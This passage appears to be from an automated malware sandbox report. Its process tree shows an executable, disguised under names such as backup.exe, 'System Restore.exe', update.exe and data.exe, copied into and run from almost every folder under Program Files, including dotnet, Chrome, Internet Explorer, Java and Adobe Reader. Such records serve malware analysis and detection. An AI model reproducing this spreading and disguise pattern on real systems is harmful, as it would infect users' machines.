        "C:\Program Files\dotnet\host\fxr\7.0.16\backup.exe" C:\Program Files\dotnet\host\fxr\7.0.16\
        9⤵
        
        PID:744
        
        C:\Program Files\dotnet\host\fxr\8.0.2\backup.exe
        
        "C:\Program Files\dotnet\host\fxr\8.0.2\backup.exe" C:\Program Files\dotnet\host\fxr\8.0.2\
        9⤵
        
        PID:432
        
        C:\Program Files\dotnet\shared\backup.exe
        
        "C:\Program Files\dotnet\shared\backup.exe" C:\Program Files\dotnet\shared\
        7⤵
        
        PID:5696
        
        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\backup.exe" C:\Program Files\dotnet\shared\Microsoft.NETCore.App\
        8⤵
        
        PID:2632
        
        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\backup.exe" C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\
        9⤵
        
        PID:5776
        
        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\backup.exe" C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\
        9⤵
        
        PID:5488
        
        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\backup.exe" C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\
        9⤵
        
        PID:1416
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\
        8⤵
        
        PID:6148
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\
        9⤵
        
        PID:5900
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\cs\
        10⤵
        
        PID:1048
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de\
        10⤵
        
        PID:6420
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\es\
        10⤵
        
        PID:2956
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\fr\
        10⤵
        
        PID:5780
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\it\
        10⤵
        
        PID:5968
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ja\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ja\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ja\
        10⤵
        
        PID:4324
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ko\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ko\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ko\
        10⤵
        
        PID:5564
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pl\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pl\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pl\
        10⤵
        
        PID:5428
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\pt-BR\
        10⤵
        
        PID:7676
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru\System Restore.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru\System Restore.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru\
        10⤵
        
        PID:3360
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\tr\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\tr\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\tr\
        10⤵
        
        PID:7848
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hans\
        10⤵
        
        PID:4976
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hant\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hant\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\zh-Hant\
        10⤵
        
        PID:2252
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\
        9⤵
        
        PID:8008
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\cs\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\cs\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\cs\
        10⤵
        
        PID:4312
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\de\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\de\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\de\
        10⤵
        
        PID:552
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\es\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\es\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\es\
        10⤵
        
        PID:6704
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\fr\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\fr\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\fr\
        10⤵
        
        PID:7840
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\it\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\it\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\it\
        10⤵
        
        PID:7788
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja\
        10⤵
        
        PID:4292
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ko\
        10⤵
        
        PID:7992
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pl\
        10⤵
        
        PID:7304
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pt-BR\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pt-BR\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\pt-BR\
        10⤵
        
        PID:5476
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru\
        10⤵
        
        PID:5400
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\tr\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\tr\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\tr\
        10⤵
        
        PID:4120
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hans\
        10⤵
        
        PID:7636
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hant\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hant\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\zh-Hant\
        10⤵
        
        PID:5192
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\
        9⤵
        
        PID:4880
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\cs\
        10⤵
        
        PID:7516
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\de\
        10⤵
        
        PID:3388
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\es\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\es\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\es\
        10⤵
        
        PID:5812
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\fr\
        10⤵
        
        PID:6188
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\it\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\it\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\it\
        10⤵
        
        PID:17788
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ja\System Restore.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ja\System Restore.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ja\
        10⤵
        
        PID:9944
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ko\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ko\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\ko\
        10⤵
        
        PID:6796
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pl\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pl\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pl\
        10⤵
        
        PID:17184
        
        C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR\backup.exe
        
        "C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR\backup.exe" C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\pt-BR\
        10⤵
        
        PID:13656
        
        C:\Program Files\dotnet\swidtag\backup.exe
        
        "C:\Program Files\dotnet\swidtag\backup.exe" C:\Program Files\dotnet\swidtag\
        7⤵
        
        PID:2508
      - C:\Program Files\Google\backup.exe
        
        "C:\Program Files\Google\backup.exe" C:\Program Files\Google\
        6⤵
        
        PID:3504
        
        C:\Program Files\Google\Chrome\backup.exe
        
        "C:\Program Files\Google\Chrome\backup.exe" C:\Program Files\Google\Chrome\
        7⤵
        
        PID:5568
        
        C:\Program Files\Google\Chrome\Application\backup.exe
        
        "C:\Program Files\Google\Chrome\Application\backup.exe" C:\Program Files\Google\Chrome\Application\
        8⤵
        
        PID:432
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\backup.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\backup.exe" C:\Program Files\Google\Chrome\Application\123.0.6312.123\
        9⤵
        
        PID:7604
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\default_apps\backup.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\default_apps\backup.exe" C:\Program Files\Google\Chrome\Application\123.0.6312.123\default_apps\
        10⤵
        
        PID:8056
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Extensions\update.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Extensions\update.exe" C:\Program Files\Google\Chrome\Application\123.0.6312.123\Extensions\
        10⤵
        
        PID:5580
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\backup.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\backup.exe" C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\
        10⤵
        
        PID:7708
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\backup.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\backup.exe" C:\Program Files\Google\Chrome\Application\123.0.6312.123\Locales\
        10⤵
        
        PID:7508
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\MEIPreload\backup.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\MEIPreload\backup.exe" C:\Program Files\Google\Chrome\Application\123.0.6312.123\MEIPreload\
        10⤵
        
        PID:6920
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\VisualElements\backup.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\VisualElements\backup.exe" C:\Program Files\Google\Chrome\Application\123.0.6312.123\VisualElements\
        10⤵
        
        PID:5468
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\backup.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\backup.exe" C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\
        10⤵
        
        PID:5168
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\_platform_specific\backup.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\_platform_specific\backup.exe" C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\_platform_specific\
        11⤵
        
        PID:8096
        
        C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\_platform_specific\win_x64\backup.exe
        
        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\_platform_specific\win_x64\backup.exe" C:\Program Files\Google\Chrome\Application\123.0.6312.123\WidevineCdm\_platform_specific\win_x64\
        12⤵
        
        PID:3056
        
        C:\Program Files\Google\Chrome\Application\SetupMetrics\backup.exe
        
        "C:\Program Files\Google\Chrome\Application\SetupMetrics\backup.exe" C:\Program Files\Google\Chrome\Application\SetupMetrics\
        9⤵
        
        PID:5472
      - C:\Program Files\Internet Explorer\backup.exe
        
        "C:\Program Files\Internet Explorer\backup.exe" C:\Program Files\Internet Explorer\
        6⤵
        
        PID:5416
        
        C:\Program Files\Internet Explorer\de-DE\backup.exe
        
        "C:\Program Files\Internet Explorer\de-DE\backup.exe" C:\Program Files\Internet Explorer\de-DE\
        7⤵
        
        PID:6560
        
        C:\Program Files\Internet Explorer\en-US\backup.exe
        
        "C:\Program Files\Internet Explorer\en-US\backup.exe" C:\Program Files\Internet Explorer\en-US\
        7⤵
        
        PID:7720
        
        C:\Program Files\Internet Explorer\es-ES\backup.exe
        
        "C:\Program Files\Internet Explorer\es-ES\backup.exe" C:\Program Files\Internet Explorer\es-ES\
        7⤵
        
        PID:7352
        
        C:\Program Files\Internet Explorer\fr-FR\backup.exe
        
        "C:\Program Files\Internet Explorer\fr-FR\backup.exe" C:\Program Files\Internet Explorer\fr-FR\
        7⤵
        
        PID:5868
        
        C:\Program Files\Internet Explorer\images\backup.exe
        
        "C:\Program Files\Internet Explorer\images\backup.exe" C:\Program Files\Internet Explorer\images\
        7⤵
        
        PID:5380
        
        C:\Program Files\Internet Explorer\it-IT\backup.exe
        
        "C:\Program Files\Internet Explorer\it-IT\backup.exe" C:\Program Files\Internet Explorer\it-IT\
        7⤵
        
        PID:1832
        
        C:\Program Files\Internet Explorer\ja-JP\backup.exe
        
        "C:\Program Files\Internet Explorer\ja-JP\backup.exe" C:\Program Files\Internet Explorer\ja-JP\
        7⤵
        
        PID:3304
        
        C:\Program Files\Internet Explorer\SIGNUP\backup.exe
        
        "C:\Program Files\Internet Explorer\SIGNUP\backup.exe" C:\Program Files\Internet Explorer\SIGNUP\
        7⤵
        
        PID:5712
        
        C:\Program Files\Internet Explorer\uk-UA\backup.exe
        
        "C:\Program Files\Internet Explorer\uk-UA\backup.exe" C:\Program Files\Internet Explorer\uk-UA\
        7⤵
        
        PID:7256
      - C:\Program Files\Java\backup.exe
        
        "C:\Program Files\Java\backup.exe" C:\Program Files\Java\
        6⤵
        
        PID:13176
        
        C:\Program Files\Java\jdk-1.8\backup.exe
        
        "C:\Program Files\Java\jdk-1.8\backup.exe" C:\Program Files\Java\jdk-1.8\
        7⤵
        
        PID:4308
        
        C:\Program Files\Java\jdk-1.8\bin\backup.exe
        
        "C:\Program Files\Java\jdk-1.8\bin\backup.exe" C:\Program Files\Java\jdk-1.8\bin\
        8⤵
        
        PID:10572
        
        C:\Program Files\Java\jdk-1.8\include\backup.exe
        
        "C:\Program Files\Java\jdk-1.8\include\backup.exe" C:\Program Files\Java\jdk-1.8\include\
        8⤵
        
        PID:10328
        
        C:\Program Files\Java\jdk-1.8\include\win32\backup.exe
        
        "C:\Program Files\Java\jdk-1.8\include\win32\backup.exe" C:\Program Files\Java\jdk-1.8\include\win32\
        9⤵
        
        PID:9036
    - - C:\Program Files (x86)\backup.exe
        
        "C:\Program Files (x86)\backup.exe" C:\Program Files (x86)\
        5⤵
        
        PID:6400
      - C:\Program Files (x86)\Adobe\backup.exe
        
        "C:\Program Files (x86)\Adobe\backup.exe" C:\Program Files (x86)\Adobe\
        6⤵
        
        PID:6724
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\
        7⤵
        
        PID:2760
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Esl\
        8⤵
        
        PID:6472
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\
        8⤵
        
        PID:528
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\
        9⤵
        
        PID:6764
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\
        10⤵
        
        PID:6420
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\
        9⤵
        
        PID:2776
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\System Restore.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\System Restore.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\locales\
        10⤵
        
        PID:6468
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroLayoutRecognizer\
        9⤵
        
        PID:5564
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\
        9⤵
        
        PID:5964
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\
        9⤵
        
        PID:6516
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\
        10⤵
        
        PID:5560
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\
        9⤵
        
        PID:2468
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\update.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\update.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\
        10⤵
        
        PID:6088
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\
        9⤵
        
        PID:4992
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\
        9⤵
        
        PID:3388
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\
        10⤵
        
        PID:6388
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\
        9⤵
        
        PID:3940
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\
        10⤵
        
        PID:5204
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\
        9⤵
        
        PID:7016
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\data.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\data.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\
        10⤵
        
        PID:1244
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\
        11⤵
        
        PID:632
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\
        10⤵
        
        PID:2632
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\
        11⤵
        
        PID:5232
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\
        12⤵
        
        PID:6352
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\
        10⤵
        
        PID:6748
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\
        11⤵
        
        PID:7896
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\backup.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\backup.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\
        10⤵
        
        PID:8184
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\data.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\data.exe" C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\
        9⤵
        
        PID:464
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\backup.exe
        
